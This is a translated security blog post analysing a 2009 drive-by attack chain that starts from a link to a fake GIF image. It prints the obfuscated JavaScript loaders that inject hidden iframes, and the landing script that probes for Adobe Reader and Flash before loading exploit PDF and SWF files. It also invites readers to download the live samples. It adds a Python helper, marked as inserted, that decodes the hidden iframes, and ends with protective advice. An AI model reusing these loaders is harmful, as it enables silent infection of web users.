
New-old pdf exploit

PS2: There is no virus in this post, although Avast may think otherwise (thanks to edio).

It all started with an innocent ICQ message from a good friend of mine:
07/31/2009 18:45:11 xyz : see hxxp: //watnhome.com/images/car.gif :)

Nothing suspicious, it seemed. Well, I think, I'll go and have a look. There was a render of some BMW; all in all, quite pleasant. But the picture had already loaded and the page-load indicator still hadn't stopped... that rang an alarm bell for me. I immediately hit Esc, after which Firefox stopped the download in that tab. Thinking that this needed looking into, I decided (for some reason) to view the source of the picture. In theory there should have been the usual binary gibberish, as in any GIF or JPEG image, BUT! The reality was much more interesting. So, we look at the image source in the browser:
view-source:hxxp://watnhome.com/images/car.gif

Wow! It's not a picture at all:
<img src="WorleyVision5.jpg">
<script type="text/javascript" src="js.js"></script>

So, what's in the JavaScript, I wonder?
Let's have a look!
view-source:hxxp://watnhome.com/images/js.js
There's a bit of nonsense in there:
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
Or, translated into a more readable form...
document.write('<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"></iframe>')


A redirect. Well, we don't stop there; we follow the chain further:
view-source:hxxp://listenz.org/stats/ru1.php
Yeah, hello from the same author:
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0076\u0065\u0072\u0069\u0076\u0065\u006c\u006c\u002e\u0063\u006f\u006d\u002f\u0075\u0070\u0064\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
or, a little more readably...
<script type="text/javascript">document.write('<iframe src="hxxp://verivell.com/upd/index.php" style="display:none"></iframe>')</script>

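To triage a redirect chain like this without running the script, here is an added Python helper, written for this post and not part of it: it pulls the string literal out of a document.write call, decodes the \uXXXX escapes, and lists the iframes the call would inject and whether CSS hides them. JS_SAMPLE is the js.js line quoted above, embedded as a constructed sample.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the js.js contents quoted in the post (one obfuscated document.write call)
JS_SAMPLE = r"""document .write( '\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e' )"""

# document.write( '...' ) with a single string-literal argument; tolerates stray whitespace
_WRITE = re.compile(r"""document\s*\.\s*write\s*\(\s*(['"])(.*?)\1\s*\)""", re.S)
# \uXXXX, \xXX and single-character JavaScript escapes
_ESC = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\(.)", re.S)

def decode_js_escapes(s):
    """Turn the body of a JavaScript string literal into the text the browser would see."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return {"n": "\n", "r": "\r", "t": "\t"}.get(m.group(3), m.group(3))  # \' \" \\ \/ stay
    return _ESC.sub(repl, s)

class _IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        self.iframes.append({"src": a.get("src", ""), "hidden": hidden})

def find_iframes(markup):
    """Collect every <iframe> in the markup, noting whether inline CSS makes it invisible."""
    p = _IframeScanner()
    p.feed(markup)
    p.close()
    return p.iframes

def analyze(js):
    """Return the iframes that each document.write in the script would inject."""
    found = []
    for _quote, literal in _WRITE.findall(js):
        found.extend(find_iframes(decode_js_escapes(literal)))
    return found

if __name__ == "__main__":
    for f in analyze(JS_SAMPLE):
        print(("HIDDEN " if f["hidden"] else "") + "iframe -> " + f["src"])
```

The same function works on the second stage above, since the <script> wrapper around document.write does not affect the match.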
This is the end of the malicious chain:
view-source:hxxp://verivell.com/upd/index.php
<script>
// Helper: writes the given markup straight into the page (used to inject the iframes below)
function PDF_SWF_Iframe(sCn)
{
    document.write(sCn);
}

// Internet Explorer branch: probe for the Adobe Reader and Flash ActiveX controls
if (navigator.userAgent.indexOf('MSIE') != -1)
{
    PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl');
    for (i in PDF)
    {
        try
        {
            obj = new ActiveXObject(PDF[i]);

            if (obj)
            {
                PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
            }
        }
        catch (e){}
    }

    try
    {
        obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');

        if (obj)
        {
            PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
        }
    }
    catch (e){}
}
// Every other browser: walk navigator.plugins looking for an Adobe PDF plugin and Flash
else
{
    // note: "<=" runs one past the end of the array; that is a bug in the original script
    for (i = 0; i <= navigator.plugins.length; i++)
    {
        var plugin = navigator.plugins[i].name;

        if ((plugin.indexOf('Adobe Acrobat') != -1) || (plugin.indexOf('Adobe PDF') != -1))
        {
            PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
        }

        if (plugin.indexOf('Flash') != -1)
        {
            PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
        }
    }
}
</script>



That is, the PDF (evenLike.pdf, detected as Exploit.Win32.Pidief.bfz) and the SWF, our favourite old friends, are welcomed onto the computer. I did not dig any further: these scripts and documents exploit a fresh July vulnerability (topic on Habr), the February one, and maybe even older ones. If you remember, at one time there was a link to a “viral video” on the Alfastrach website which, as it turned out, was viral without the quotes, because it planted Trojan-Spy.Win32.Zbot.gkj on the user's computer.

Want to play? You can easily download these documents and see what each of them does. If that is not enough, there is another "example", but its author warns that 'This virus is srs business!' (“This virus is serious business”).

So, together with TechBytesDaily, I urge you to turn off PDF display in the browser window, however convenient it may seem. Always save PDF documents to disk first, and wherever possible use the free, lighter-weight alternatives to Adobe Acrobat (such as Foxit Reader or Sumatra PDF). Unfortunately, Adobe's plugin does not adequately filter the received content before handing it over to be shown to the user in the browser.

And once again about security: be wary of unexplained messages even from people you know well, especially if they contain a link to an unknown resource and no personal comment from the sender.

PS: In the links, http was changed to hxxp by me on purpose.

Source: https://habr.com/ru/post/65927/
